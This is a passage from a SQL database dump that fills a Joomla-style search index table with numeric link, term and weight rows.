(236, 269162, 1.21331),
(236, 269163, 1.05),
(236, 269164, 0.98),
(236, 269165, 1.09669),
(236, 269166, 1.09669),
(236, 269167, 1.09669),
(236, 269168, 0.93331),
(236, 269169, 1.91338),
(236, 269170, 1.07331),
(236, 269171, 0.98),
(236, 269172, 1.05),
(236, 269173, 1.05),
(236, 269174, 0.93331),
(236, 269175, 1.00331),
(236, 269176, 0.95669),
(236, 269177, 1.09669),
(236, 269178, 1.16669),
(236, 269179, 1.02669),
(236, 269180, 1.02669),
(236, 269181, 0.98),
(236, 269182, 0.98),
(236, 269183, 0.95669),
(236, 269184, 1.02669),
(236, 269185, 1.09669),
(236, 269186, 1.09669),
(236, 269187, 1.05),
(236, 269188, 1.14331),
(236, 269189, 1.09669),
(236, 269190, 0.88669),
(236, 269191, 1.00331),
(236, 269192, 0.95669),
(236, 269193, 1.02669),
(236, 269194, 0.95669),
(236, 269195, 1.07331),
(236, 269196, 1.07331),
(236, 269197, 1.72662),
(236, 269198, 0.98),
(236, 269199, 1.00331),
(236, 269200, 1.02669),
(236, 269201, 1.07331),
(236, 269202, 0.95669),
(236, 269203, 1.05),
(236, 269204, 0.32669),
(236, 269205, 1.00331),
(236, 269206, 1.33),
(236, 269207, 1.14331),
(236, 269208, 0.93331),
(236, 269209, 1.00331),
(236, 269210, 1.05),
(236, 269211, 1.12),
(236, 269212, 0.46662),
(236, 269213, 1.72662),
(236, 269214, 0.91),
(236, 269215, 0.91),
(236, 269216, 1.05),
(236, 269217, 1.12),
(236, 269218, 1.00331),
(236, 269219, 1.16669),
(236, 269220, 1.00331),
(236, 269221, 1.09669),
(236, 269222, 0.93331),
(236, 269223, 1.02669),
(236, 269224, 1.02669),
(236, 269225, 1.05),
(236, 269226, 1.02669),
(236, 269227, 0.81669),
(236, 269228, 0.86331),
(236, 269229, 0.23331),
(236, 269230, 0.86331),
(236, 269231, 1.02669),
(236, 269232, 1.00331),
(236, 269233, 1.07331),
(236, 269234, 0.91),
(236, 269235, 1.00331),
(236, 269236, 0.88669),
(236, 269237, 0.91),
(236, 269238, 1.00331),
(236, 269239, 0.95669),
(236, 269240, 0.86331),
(236, 269241, 0.95669),
(236, 269242, 1.00331),
(236, 269243, 0.93331),
(236, 269244, 1.02669),
(236, 269245, 0.93331),
(236, 269246, 1.05),
(236, 269247, 1.02669),
(236, 269248, 0.95669),
(236, 269249, 0.95669),
(236, 269250, 1.07331),
(236, 269251, 1.00331),
(236, 269252, 1.09669),
(236, 269253, 1.00331),
(236, 269254, 1.00331),
(236, 269255, 1.12),
(236, 269256, 0.37331),
(236, 269257, 1.00331),
(236, 269258, 1.16669),
(236, 269259, 1.09669),
(236, 269260, 1.35331),
(236, 269261, 0.86331),
(236, 269262, 1.02669),
(237, 269395, 0.84),
(237, 269396, 1.02669),
(237, 269569, 0.93331),
(237, 269570, 1.12),
(237, 269571, 0.91),
(237, 269572, 1.02669),
(237, 269573, 0.51331),
(237, 269574, 1.14331),
(237, 269575, 1.23669),
(237, 269576, 0.95669),
(237, 269577, 1.02669),
(237, 269578, 0.93331),
(237, 269579, 1.05),
(237, 269580, 0.86331),
(237, 269581, 0.95669),
(237, 269582, 1.09669),
(237, 269804, 1.05),
(237, 269805, 1.00331),
(237, 269806, 1.12),
(237, 269807, 0.88669),
(237, 269808, 1.12),
(237, 269809, 0.98),
(237, 269810, 0.95669),
(237, 269811, 1.05),
(237, 269812, 1.02669),
(237, 269813, 1.02669),
(237, 269814, 0.98),
(237, 269815, 0.86331),
(290, 269815, 0.86331),
(292, 269815, 0.86331),
(237, 269816, 0.98),
(237, 269817, 1.00331),
(237, 269818, 0.93331),
(237, 269819, 1.09669),
(237, 269820, 0.95669),
(237, 269821, 1.16669),
(237, 269822, 2.14662),
(237, 269823, 1.05),
(237, 269824, 1.05),
(237, 269825, 1.07331),
(237, 269826, 0.98),
(237, 269827, 1.05),
(237, 269828, 1.02669),
(237, 269829, 1.00331),
(237, 269830, 1.07331),
(237, 269831, 1.05),
(237, 269832, 0.88669),
(237, 269833, 1.07331),
(237, 269834, 0.91),
(237, 269835, 0.98),
(237, 269836, 1.14331),
(237, 269837, 0.88669),
(287, 269837, 2.66007),
(237, 269838, 1.09669),
(237, 269839, 0.98),
(237, 269840, 1.14331),
(237, 269841, 0.91),
(237, 269842, 1.16669),
(237, 269843, 1.02669),
(237, 269844, 0.98),
(305, 269844, 0.98),
(237, 269845, 1.14331),
(237, 269846, 0.95669),
(237, 269847, 0.95669),
(237, 269848, 1.05),
(237, 269849, 0.95669),
(237, 269850, 1.00331),
(237, 269851, 1.07331),
(237, 269852, 0.98),
(237, 269853, 0.95669),
(237, 269854, 1.00331),
(237, 269855, 0.98),
(237, 269856, 0.91),
(237, 269857, 1.02669),
(237, 269858, 0.95669),
(292, 269858, 0.95669),
(237, 269859, 1.05),
(292, 269859, 1.05),
(237, 269860, 1.05),
(237, 269861, 0.98),
(237, 269862, 1.16669),
(237, 269863, 0.23331),
(305, 269863, 0.23331),
(237, 269864, 0.88669),
(237, 269865, 1.07331),
(237, 269866, 0.88669),
(237, 269867, 1.00331),
(238, 270486, 0.84),
(238, 270487, 0.91),
(238, 270488, 0.88669),
(238, 270489, 1.09669),
(238, 270490, 0.35),
(238, 270491, 0.88669),
(238, 270492, 1.02669),
(238, 270493, 0.35),
(238, 270494, 0.86331),
(238, 270495, 1.00331),
(238, 270496, 0.79331),
(238, 270497, 0.93331),
(238, 270507, 0.81669),
(238, 270508, 0.91),
(238, 270509, 0.86331),
(238, 270510, 0.98),
(238, 270511, 0.91),
(238, 270512, 0.79331),
(238, 270513, 0.84),
(238, 270809, 0.18669),
(238, 270810, 0.86331),
(238, 270811, 0.93331),
(238, 270812, 9.30981),
(238, 270813, 9.87981),
(238, 270814, 0.28),
(238, 270815, 0.91),
(238, 270816, 1.07331),
(238, 270817, 0.23331),
(238, 270818, 0.91),
(238, 270819, 1.00331),
(238, 270820, 1.00331),
(238, 270821, 0.95669),
(238, 270822, 1.12),
(238, 270823, 0.32669),
(238, 270824, 0.93331),
(238, 270825, 1.02669),
(238, 270826, 1.00331),
(238, 270827, 1.23669),
(238, 270828, 1.02669),
(238, 270829, 1.07331),
(238, 270830, 1.16669),
(238, 270831, 1.02669),
(238, 270832, 1.14331),
(238, 270833, 0.95669),
(238, 270834, 1.23669),
(238, 271375, 1.00331),
(238, 271376, 1.12),
(238, 271377, 0.98),
(238, 271378, 1.05),
(238, 271379, 1.07331),
(238, 271380, 1.14331),
(238, 271381, 0.37331),
(238, 271382, 0.98),
(238, 271383, 1.05),
(238, 271384, 1.09669),
(238, 271385, 1.07331),
(238, 271386, 0.95669),
(238, 271387, 1.00331),
(238, 271388, 0.91),
(238, 271389, 1.05),
(238, 271390, 1.05),
(238, 271391, 0.88669),
(238, 271392, 1.00331),
(238, 271393, 0.98),
(238, 271394, 2.66007),
(238, 271395, 3.15),
(238, 271396, 1.00331),
(238, 271397, 1.05),
(238, 271398, 1.02669),
(238, 271399, 1.14331),
(238, 271400, 1.09669),
(238, 271401, 0.98),
(238, 271402, 1.05),
(238, 271403, 0.95669),
(238, 271404, 1.05),
(238, 271405, 0.86331),
(305, 271405, 0.86331),
(288, 271405, 1.72662),
(238, 271406, 0.98),
(238, 271407, 0.93331),
(238, 271408, 1.00331),
(238, 271409, 1.05),
(238, 271410, 1.14331),
(238, 271411, 1.00331),
(238, 271412, 1.02669),
(238, 271413, 1.91338),
(238, 271414, 1.02669),
(238, 271415, 1.02669),
(238, 271416, 0.98),
(238, 271417, 0.98),
(238, 271418, 1.12),
(238, 271419, 1.00331),
(238, 271420, 0.93331),
(238, 271421, 1.00331),
(292, 271421, 1.00331),
(238, 271422, 0.95669),
(238, 271423, 1.05),
(238, 271424, 0.95669),
(238, 271425, 1.07331),
(238, 271426, 1.02669),
(238, 271427, 1.19),
(238, 271428, 0.95669),
(238, 271429, 1.07331),
(238, 271430, 1.12),
(238, 271431, 1.07331),
(238, 271432, 1.07331),
(238, 271433, 1.02669),
(238, 271434, 0.95669),
(238, 271435, 1.05),
(238, 271436, 1.16669),
(238, 271437, 0.98),
(238, 271438, 1.07331),
(306, 271439, 0.93331),
(238, 271439, 1.86662),
(238, 271440, 1.02669),
(238, 271441, 1.12),
(238, 271442, 0.98),
(238, 271443, 1.05),
(238, 271444, 1.02669),
(238, 271445, 1.28331),
(238, 271446, 1.82),
(238, 271447, 1.09669),
(238, 271448, 1.02669),
(238, 271449, 0.93331),
(238, 271450, 1.16669),
(238, 271451, 0.88669),
(238, 271452, 1.05),
(238, 271453, 0.98),
(238, 271454, 0.86331),
(238, 271455, 0.95669),
(238, 271456, 0.88669),
(238, 271457, 0.98),
(238, 271458, 0.88669),
(292, 271458, 0.88669),
(238, 271459, 1.00331),
(238, 271460, 0.95669),
(238, 271461, 1.16669),
(238, 271462, 0.88669),
(238, 271463, 0.98),
(238, 271464, 1.05),
(238, 271465, 1.02669),
(290, 271465, 1.02669),
(238, 271466, 0.93331),
(238, 271467, 1.05),
(238, 271468, 1.09669),
(238, 271469, 0.88669),
(238, 271470, 1.00331),
(238, 271471, 1.05),
(238, 271472, 1.05),
(238, 271473, 0.93331),
(238, 271474, 1.00331),
(238, 271475, 1.02669),
(238, 271476, 1.12),
(238, 271477, 1.00331),
(238, 271478, 1.16669),
(238, 271479, 0.98),
(238, 271480, 1.09669),
(238, 271481, 1.00331),
(238, 271482, 1.02669),
(238, 271483, 1.02669),
(238, 271484, 0.98),
(238, 271485, 0.93331),
(238, 271486, 1.07331),
(238, 271487, 0.93331),
(238, 271488, 0.98),
(238, 271489, 0.91),
(238, 271490, 1.05),
(238, 271491, 1.07331),
(238, 271492, 1.07331),
(238, 271493, 1.00331),
(238, 271494, 0.86331),
(238, 271495, 0.98),
(238, 271496, 0.93331),
(238, 271497, 0.98),
(238, 271498, 1.16669),
(238, 271499, 0.88669),
(238, 271500, 0.95669),
(305, 271501, 0.86331),
(238, 271501, 1.72662),
(238, 271502, 1.91338),
(238, 271503, 1.05),
(238, 271504, 1.02669),
(238, 271505, 1.00331),
(238, 271506, 0.88669),
(304, 271506, 0.88669),
(238, 271507, 1.05),
(238, 271508, 1.05),
(238, 271509, 0.98),
(238, 271510, 1.05),
(238, 271511, 0.95669),
(238, 271512, 1.05),
(238, 271513, 0.91),
(238, 271514, 1.00331),
(238, 271515, 1.00331),
(239, 272478, 0.86331),
(239, 272479, 1.07331),
(239, 272480, 0.91),
(239, 272869, 0.88669),
(239, 272870, 1.00331),
(239, 272871, 0.88669),
(239, 272872, 0.95669),
(239, 272873, 1.09669),
(239, 272874, 1.19),
(239, 272875, 0.46669),
(239, 272876, 1.00331),
(239, 272877, 1.12),
(239, 272878, 0.98),
(239, 272879, 1.16669),
(239, 272880, 1.02669),
(239, 272881, 1.14331),
(239, 272882, 0.91),
(239, 272883, 1.02669),
(239, 272884, 0.88669),
(239, 272885, 1.00331),
(239, 272886, 0.91),
(239, 272887, 1.02669),
(239, 272888, 0.32669),
(239, 272889, 0.93331),
(239, 272890, 1.00331),
(239, 272891, 0.95669),
(239, 272892, 1.07331),
(239, 272893, 0.91),
(239, 272894, 1.05),
(239, 272895, 0.37331),
(239, 272896, 1.07331),
(239, 272897, 1.16669),
(239, 272898, 0.28),
(292, 272898, 0.28),
(239, 272899, 0.93331),
(292, 272899, 0.93331),
(239, 272900, 1.00331),
(239, 272901, 0.84),
(239, 272902, 0.93331),
(239, 272903, 1.02669),
(239, 272904, 0.56),
(239, 272905, 1.05),
(239, 272906, 1.30669),
(239, 273512, 1.07331),
(239, 273513, 0.98),
(239, 273514, 1.09669),
(239, 273515, 1.82),
(239, 273516, 1.07331),
(239, 273517, 1.09669),
(239, 273518, 0.93331),
(239, 273519, 1.00331),
(239, 273520, 1.02669),
(239, 273521, 1.09669),
(239, 273522, 1.05),
(239, 273523, 0.93331),
(239, 273524, 0.95669),
(239, 273525, 1.05),
(239, 273526, 1.02669),
(239, 273527, 1.96),
(239, 273528, 2.19338),
(239, 273529, 1.16669),
(239, 273530, 1.09669),
(239, 273531, 0.98),
(239, 273532, 0.98),
(239, 273533, 1.23669),
(239, 273534, 1.07331),
(239, 273535, 1.00331),
(239, 273536, 1.00331),
(239, 273537, 1.09669),
(239, 273538, 1.00331),
(239, 273539, 1.07331),
(239, 273540, 1.00331),
(239, 273541, 1.00331),
(239, 273542, 1.05),
(239, 273543, 1.09669),
(239, 273544, 1.19),
(239, 273545, 1.07331),
(239, 273546, 2.14662),
(239, 273547, 1.21331),
(239, 273548, 1.14331),
(239, 273549, 0.98),
(239, 273550, 1.07331),
(239, 273551, 1.00331),
(239, 273552, 1.02669),
(239, 273553, 1.02669),
(239, 273554, 0.93331),
(239, 273555, 1.09669),
(239, 273556, 0.98),
(239, 273557, 1.02669),
(239, 273558, 1.09669),
(239, 273559, 1.00331),
(239, 273560, 0.98),
(239, 273561, 1.00331),
(239, 273562, 1.07331),
(239, 273563, 1.05),
(239, 273564, 1.09669),
(239, 273565, 1.00331),
(240, 273566, 1.00331),
(239, 273566, 2.00662),
(239, 273567, 1.02669),
(239, 273568, 1.12),
(239, 273569, 1.05),
(239, 273570, 1.02669),
(239, 273571, 1.16669),
(239, 273572, 1.05),
(239, 273573, 2.14662),
(239, 273574, 0.95669),
(239, 273575, 1.16669),
(239, 273576, 1.00331),
(239, 273577, 0.95669),
(239, 273578, 0.95669),
(239, 273579, 1.09669),
(239, 273580, 1.00331),
(239, 273581, 1.05),
(239, 273582, 1.00331),
(239, 273583, 1.30669),
(239, 273584, 1.00331),
(239, 273585, 1.09669),
(239, 273586, 0.98),
(239, 273587, 1.00331),
(239, 273588, 0.91),
(239, 273589, 0.98),
(239, 273590, 1.07331),
(239, 273591, 1.02669),
(239, 273592, 1.02669),
(239, 273593, 0.98),
(239, 273594, 1.30669),
(239, 273595, 1.05),
(239, 273596, 1.21331),
(239, 273597, 0.93331),
(239, 273598, 1.07331),
(239, 273599, 0.84),
(239, 273600, 1.12),
(239, 273601, 0.95669),
(239, 273602, 0.93331),
(288, 273602, 0.93331),
(239, 273603, 1.05),
(239, 273604, 0.88669),
(239, 273605, 1.12),
(239, 273606, 1.14331),
(239, 273607, 0.88669),
(239, 273608, 1.00331),
(239, 273609, 1.00331),
(239, 273610, 1.02669),
(239, 273611, 1.21331),
(239, 273612, 0.98),
(239, 273613, 1.12),
(239, 273614, 1.02669),
(239, 273615, 1.05),
(239, 273616, 0.95669),
(239, 273617, 1.07331),
(239, 273618, 1.16669),
(239, 273619, 1.05),
(239, 273620, 0.95669),
(239, 273621, 1.05),
(239, 273622, 1.00331),
(239, 273623, 0.88669),
(239, 273624, 1.02669),
(239, 273625, 1.14331),
(239, 273626, 1.33),
(239, 273627, 1.00331),
(239, 273628, 1.07331),
(239, 273629, 1.09669),
(239, 273630, 0.98),
(239, 273631, 1.07331),
(239, 273632, 0.98),
(239, 273633, 1.02669),
(239, 273634, 1.09669),
(239, 273635, 0.88669),
(239, 273636, 0.95669),
(239, 273637, 1.12),
(239, 273638, 1.33),
(239, 273639, 0.88669),
(239, 273640, 1.07331),
(239, 273641, 0.91),
(239, 273642, 1.02669),
(239, 273643, 0.28),
(239, 273644, 0.91),
(239, 273645, 1.00331),
(239, 273646, 1.00331),
(239, 273647, 1.09669),
(239, 273648, 0.98),
(239, 273649, 1.07331),
(305, 273650, 0.95669),
(239, 273650, 1.91338),
(239, 273651, 1.14331),
(239, 273652, 1.02669),
(239, 273653, 1.02669),
(239, 273654, 0.95669),
(239, 273655, 0.91),
(288, 273655, 0.91),
(239, 273656, 1.07331),
(239, 273657, 1.00331),
(239, 273658, 1.05),
(239, 273659, 0.88669),
(239, 273660, 1.14331),
(239, 273661, 0.93331),
(239, 273662, 0.93331),
(239, 273663, 0.93331),
(239, 273664, 1.96),
(239, 273665, 0.95669),
(239, 273666, 0.98),
(306, 273667, 0.86331),
(239, 273667, 1.72662),
(239, 273668, 1.91338),
(239, 273669, 1.00331),
(239, 273670, 1.09669),
(239, 273671, 0.91),
(287, 273671, 0.91),
(239, 273672, 1.09669),
(239, 273673, 0.93331),
(239, 273674, 1.02669),
(239, 273675, 0.91),
(239, 273676, 1.02669),
(239, 273677, 1.16669),
(239, 273678, 1.05),
(239, 273679, 0.88669),
(239, 273680, 0.98),
(239, 273681, 0.86331),
(239, 273682, 0.95669),
(239, 273683, 1.09669),
(239, 273684, 0.93331),
(239, 273685, 1.02669),
(239, 273686, 1.00331),
(239, 273687, 1.02669),
(239, 273688, 1.05),
(239, 273689, 1.12),
(239, 273690, 1.05),
(239, 273691, 0.98),
(239, 273692, 1.00331),
(239, 273693, 0.91),
(239, 273694, 1.00331),
(239, 273695, 0.88669),
(239, 273696, 0.98),
(239, 273697, 1.02669),
(239, 273698, 1.02669),
(239, 273699, 0.93331),
(239, 273700, 0.93331),
(290, 273700, 0.93331),
(239, 273701, 1.05),
(239, 273702, 0.95669),
(239, 273703, 1.09669),
(239, 273704, 1.09669),
(239, 273705, 1.19),
(239, 273706, 1.16669),
(239, 273707, 1.30669),
(239, 273708, 0.95669),
(239, 273709, 1.07331),
(239, 273710, 1.86662),
(239, 273711, 0.98),
(239, 273712, 1.02669),
(239, 273713, 0.95669),
(239, 273714, 1.07331),
(239, 273715, 0.95669),
(239, 273716, 1.02669),
(239, 273717, 0.95669),
(239, 273718, 1.02669),
(239, 273719, 0.95669),
(239, 273720, 1.02669),
(239, 273721, 0.98),
(239, 273722, 0.86331),
(239, 273723, 1.00331),
(240, 274536, 0.81669),
(240, 274537, 0.88669),
(240, 274538, 0.88669),
(240, 274539, 0.95669),
(240, 274542, 0.86331),
(240, 274543, 0.93331),
(240, 274544, 0.81669),
(240, 274545, 0.91),
(240, 274977, 1.02669),
(240, 274978, 1.07331),
(240, 274979, 0.91),
(240, 274980, 0.98),
(240, 274981, 0.91),
(240, 274982, 1.21331),
(240, 274983, 0.23331),
(240, 274984, 0.91),
(240, 274985, 1.09669),
(240, 274986, 1.21331),
(240, 274987, 1.28331),
(240, 274988, 1.02669),
(240, 274989, 1.16669),
(240, 274990, 1.14331),
(240, 274991, 1.37669),
(240, 274992, 0.88669),
(240, 274993, 0.95669),
(240, 274994, 1.28331),
(240, 274995, 0.98),
(240, 274996, 1.09669),
(240, 274997, 1.00331),
(240, 274998, 1.21331),
(240, 274999, 1.21331),
(240, 275000, 0.95669),
(240, 275001, 1.02669),
(240, 275002, 2.87007),
(240, 275003, 1.09669),
(240, 275004, 1.02669),
(240, 275005, 1.09669),
(240, 275006, 0.86331),
(240, 275007, 0.93331),
(240, 275008, 0.91),
(240, 275009, 0.95669),
(240, 275010, 1.14331),
(240, 275011, 1.05),
(305, 275011, 1.05),
(240, 275012, 1.16669),
(240, 275013, 0.98),
(240, 275014, 1.12),
(240, 275015, 1.00331),
(240, 275016, 1.09669),
(240, 275017, 1.14331),
(240, 275018, 1.09669),
(240, 275019, 1.23669),
(240, 275020, 0.88669),
(240, 275021, 1.00331),
(240, 275022, 0.93331),
(240, 275023, 1.00331),
(240, 275024, 0.51331),
(240, 275025, 1.07331),
(240, 275026, 1.14331),
(240, 275027, 0.42),
(240, 275028, 1.14331),
(240, 275029, 1.23669),
(240, 275769, 1.09669),
(240, 275770, 1.28331),
(240, 275771, 0.93331),
(240, 275772, 1.02669),
(240, 275773, 1.07331),
(240, 275774, 1.23669),
(240, 275775, 0.98),
(240, 275776, 1.05),
(240, 275777, 0.23331),
(240, 275778, 0.95669),
(240, 275779, 1.09669),
(240, 275780, 0.98),
(240, 275781, 1.05),
(240, 275782, 0.88669),
(240, 275783, 0.95669),
(240, 275784, 0.91),
(240, 275785, 1.16669),
(240, 275786, 0.98),
(240, 275787, 1.05),
(240, 275788, 0.95669),
(240, 275789, 1.05),
(240, 275790, 1.00331),
(240, 275791, 0.86331),
(240, 275792, 0.93331),
(240, 275793, 1.16669),
(240, 275794, 0.98),
(240, 275795, 1.21331),
(240, 275796, 1.07331),
(240, 275797, 1.14331),
(240, 275798, 1.00331),
(240, 275799, 1.05),
(240, 275800, 0.98),
(240, 275801, 1.12),
(240, 275802, 1.00331),
(240, 275803, 1.19),
(240, 275804, 0.95669),
(240, 275805, 1.02669),
(240, 275806, 1.12),
(240, 275807, 1.02669),
(240, 275808, 1.02669),
(240, 275809, 1.02669),
(240, 275810, 1.26),
(240, 275811, 0.88669),
(240, 275812, 1.05),
(240, 275813, 0.95669),
(240, 275814, 1.12),
(240, 275815, 1.14331),
(240, 275816, 1.07331),
(240, 275817, 0.98),
(292, 275817, 0.98),
(240, 275818, 1.96),
(240, 275819, 2.33338),
(240, 275820, 1.21331),
(240, 275821, 1.07331),
(240, 275822, 1.82),
(240, 275823, 1.91338),
(240, 275824, 1.12),
(240, 275825, 0.95669),
(240, 275826, 1.02669),
(240, 275827, 1.00331),
(240, 275828, 1.07331),
(240, 275829, 0.93331),
(240, 275830, 1.00331),
(240, 275831, 1.00331),
(240, 275832, 1.02669),
(240, 275833, 0.86331),
(240, 275834, 0.93331),
(292, 275835, 1.07331),
(240, 275835, 2.14662),
(240, 275836, 1.05),
(240, 275837, 0.91),
(240, 275838, 1.05),
(240, 275839, 1.09669),
(240, 275840, 1.28331),
(240, 275841, 1.21331),
(240, 275842, 1.30669),
(240, 275843, 0.91),
(240, 275844, 0.95669),
(240, 275845, 0.28),
(240, 275846, 0.91),
(240, 275847, 1.09669),
(240, 275848, 0.95669),
(240, 275849, 1.02669),
(240, 275850, 0.51331),
(240, 275851, 1.19),
(240, 275852, 1.26),
(240, 275853, 0.46669),
(240, 275854, 1.16669),
(240, 275855, 1.23669),
(240, 275856, 1.09669),
(240, 275857, 1.16669),
(240, 275858, 1.05),
(240, 275859, 1.00331),
(240, 275860, 1.07331),
(240, 275861, 0.98),
(240, 275862, 1.30669),
(240, 275863, 1.07331),
(240, 275864, 0.86331),
(240, 275865, 0.95669),
(240, 275866, 0.95669),
(240, 275867, 0.98),
(240, 275868, 1.05),
(240, 275869, 1.02669),
(240, 275870, 1.00331),
(240, 275871, 1.09669),
(240, 275872, 0.91),
(240, 275873, 1.00331),
(240, 275874, 1.02669),
(240, 275875, 0.93331),
(240, 275876, 1.02669),
(240, 275877, 0.93331),
(240, 275878, 1.00331),
(240, 275879, 0.95669),
(240, 275880, 2.00662),
(240, 275881, 1.02669),
(240, 275882, 2.05338),
(240, 275883, 1.07331),
(240, 275884, 1.16669),
(240, 275885, 1.09669),
(287, 275885, 1.09669),
(240, 275886, 0.84),
(240, 275887, 0.93331),
(240, 275888, 0.86331),
(240, 275889, 1.05),
(240, 275890, 0.86331),
(240, 275891, 0.95669),
(240, 275892, 0.98),
(240, 275893, 1.07331),
(240, 275894, 1.00331),
(240, 275895, 0.95669),
(240, 275896, 0.93331),
(240, 275897, 1.02669),
(240, 275898, 1.00331),
(240, 275899, 0.88669),
(304, 275899, 0.88669),
(240, 275900, 1.02669),
(240, 275901, 0.93331),
(240, 275902, 1.16669),
(240, 275903, 0.93331),
(304, 275903, 0.93331),
(240, 275904, 1.77338),
(240, 275905, 0.98),
(240, 275906, 1.02669),
(240, 275907, 0.93331),
(240, 275908, 1.05),
(240, 275909, 1.02669),
(240, 275910, 0.95669),
(240, 275911, 0.95669),
(240, 275912, 0.98),
(240, 275913, 1.07331),
(240, 275914, 0.93331),
(305, 275914, 0.93331),
(240, 275915, 1.02669),
(240, 275916, 0.98),
(306, 275916, 0.98);
INSERT INTO `y57u5_finder_links_termse` (`link_id`, `term_id`, `weight`) VALUES
(240, 275917, 0.84),
(240, 275918, 0.91),
(240, 275919, 1.00331),
(240, 275920, 0.93331),
(240, 275921, 1.02669),
(240, 275922, 1.09669),
(240, 275923, 0.88669),
(240, 275924, 0.98),
(240, 275925, 0.98),
(240, 275926, 1.12),
(240, 275927, 0.86331),
(240, 275928, 0.98),
(240, 275929, 1.07331),
(240, 275930, 1.02669),
(240, 275931, 1.28331),
(240, 275932, 0.86331),
(240, 275933, 0.93331),
(240, 275934, 0.84),
(305, 275934, 0.84),
(240, 275935, 0.98),
(240, 275936, 0.98),
(240, 275937, 1.05),
(240, 275938, 1.09669),
(240, 275939, 0.88669),
(240, 275940, 1.07331),
(240, 275941, 1.12),
(240, 275942, 1.21331),
(240, 275943, 0.86331),
(240, 275944, 1.19),
(240, 275945, 0.18669),
(292, 275945, 0.37338),
(240, 275946, 0.93331),
(240, 275947, 1.09669),
(240, 275948, 1.14331),
(240, 275949, 1.19),
(240, 275950, 0.91),
(240, 275951, 1.07331),
(240, 275952, 1.14331),
(240, 275953, 1.23669),
(240, 275954, 0.93331),
(240, 275955, 1.12),
(240, 275956, 0.98),
(240, 275957, 1.14331),
(241, 276747, 1.05),
(241, 276748, 0.95669),
(241, 276749, 1.05),
(241, 276750, 1.00331),
(241, 276751, 1.09669),
(241, 276752, 0.42),
(241, 276753, 1.02669),
(241, 276754, 1.12),
(241, 276755, 1.68),
(241, 276756, 0.98),
(241, 276757, 0.95669),
(241, 276758, 0.37331),
(241, 276759, 1.00331),
(241, 276760, 1.09669),
(241, 276761, 0.51331),
(241, 276762, 1.09669),
(241, 276763, 1.19),
(241, 276764, 1.00331),
(241, 276765, 1.09669),
(241, 276766, 0.98),
(241, 276767, 1.07331),
(241, 276768, 1.16669),
(241, 277143, 1.05),
(241, 277144, 1.00331),
(241, 277145, 1.12),
(241, 277146, 1.00331),
(241, 277147, 0.95669),
(241, 277148, 0.95669),
(241, 277149, 1.09669),
(241, 277150, 0.98),
(241, 277151, 0.91),
(241, 277152, 1.00331),
(241, 277153, 0.93331),
(241, 277154, 1.02669),
(241, 277155, 0.98),
(241, 277156, 1.05),
(241, 277157, 0.98),
(241, 277158, 1.02669),
(241, 277159, 0.95669),
(241, 277160, 1.91338),
(241, 277161, 1.05),
(241, 277162, 1.02669),
(241, 277163, 0.91),
(241, 277164, 1.02669),
(241, 277165, 1.02669),
(241, 277166, 1.05),
(241, 277167, 0.95669),
(241, 277168, 1.16669),
(241, 277169, 0.98),
(241, 277170, 1.00331),
(241, 277171, 0.91),
(241, 277172, 1.02669),
(241, 277173, 0.98),
(241, 277174, 0.28),
(241, 277175, 0.98),
(241, 277176, 1.07331),
(241, 277177, 1.00331),
(241, 277178, 1.07331),
(241, 277179, 0.98),
(241, 277180, 1.05),
(241, 277181, 1.00331),
(241, 277182, 0.93331),
(241, 277183, 1.00331),
(241, 277184, 0.98),
(241, 277185, 1.21331),
(241, 277186, 1.00331),
(241, 277187, 1.26),
(241, 277188, 1.00331),
(241, 277189, 1.12),
(241, 277190, 1.86662),
(241, 277191, 0.88669),
(241, 277192, 1.09669),
(241, 277193, 1.02669),
(241, 277194, 2.05338),
(241, 277195, 1.12),
(241, 277196, 1.14331),
(241, 277197, 0.98),
(241, 277198, 1.02669),
(241, 277199, 0.88669),
(241, 277200, 1.00331),
(241, 277201, 0.98),
(241, 277202, 1.00331),
(241, 277203, 1.12),
(241, 277204, 1.07331),
(241, 277205, 1.12),
(241, 277206, 1.72662),
(241, 277207, 1.00331),
(241, 277208, 0.98),
(241, 277209, 1.35331),
(241, 277210, 0.95669),
(241, 277211, 1.00331),
(241, 277212, 0.98),
(241, 277213, 0.86331),
(241, 277214, 1.14331),
(241, 277215, 0.88669),
(290, 277215, 0.88669),
(241, 277216, 0.98),
(241, 277217, 1.02669),
(241, 277218, 1.09669),
(241, 277219, 1.07331),
(241, 277220, 0.86331),
(241, 277221, 0.95669),
(241, 277222, 1.16669),
(241, 277223, 1.12),
(241, 277224, 1.00331),
(241, 277225, 0.91),
(241, 277226, 1.05),
(241, 277227, 1.00331),
(241, 277228, 1.16669),
(241, 277229, 1.05),
(241, 277230, 0.88669),
(241, 277231, 1.00331),
(241, 277232, 1.00331),
(241, 277233, 1.05),
(241, 277234, 0.91),
(241, 277235, 0.98),
(241, 277236, 0.95669),
(241, 277237, 0.98),
(241, 277238, 0.88669),
(241, 277239, 0.98),
(241, 277240, 0.88669),
(241, 277241, 1.00331),
(241, 277242, 0.86331),
(241, 277243, 1.00331),
(241, 277244, 0.91),
(241, 277245, 1.02669),
(241, 277246, 1.02669),
(305, 277246, 1.02669),
(241, 277247, 0.91),
(241, 277248, 1.00331),
(241, 277249, 0.95669),
(241, 277250, 1.12),
(241, 277251, 1.05),
(241, 277252, 1.05),
(305, 277252, 1.05),
(306, 277252, 3.15),
(241, 277253, 0.95669),
(241, 277254, 0.86331),
(241, 277255, 0.95669),
(241, 277256, 0.93331),
(241, 277257, 1.12),
(241, 277258, 0.91),
(241, 277259, 1.00331),
(241, 277260, 0.91),
(241, 277261, 1.00331),
(241, 277262, 0.98),
(241, 277263, 1.09669),
(241, 277264, 1.07331),
(241, 277265, 1.07331),
(241, 277266, 0.98),
(241, 277267, 0.98),
(241, 277268, 0.74662),
(241, 277269, 0.98),
(241, 277270, 1.21331),
(241, 277271, 1.00331),
(241, 277272, 1.07331),
(241, 277273, 1.02669),
(241, 277274, 1.82),
(241, 277275, 0.98),
(241, 277276, 1.00331),
(241, 277277, 1.00331),
(242, 277596, 0.84),
(242, 277597, 0.98),
(242, 277598, 0.84),
(242, 277599, 0.95669),
(242, 277600, 0.35),
(242, 277601, 0.91),
(242, 277602, 1.02669),
(242, 278104, 1.12),
(242, 278105, 1.28331),
(242, 278106, 0.86331),
(242, 278107, 0.98),
(242, 278108, 0.86331),
(242, 278109, 1.05),
(242, 278110, 0.23331),
(242, 278111, 0.91),
(242, 278112, 1.02669),
(242, 278113, 0.95669),
(242, 278114, 1.19),
(242, 278115, 1.02669),
(242, 278116, 0.88669),
(242, 278117, 1.02669),
(242, 278118, 1.12),
(242, 278119, 1.21331),
(242, 278120, 0.93331),
(242, 278121, 1.02669),
(242, 278122, 1.12),
(242, 278123, 0.95669),
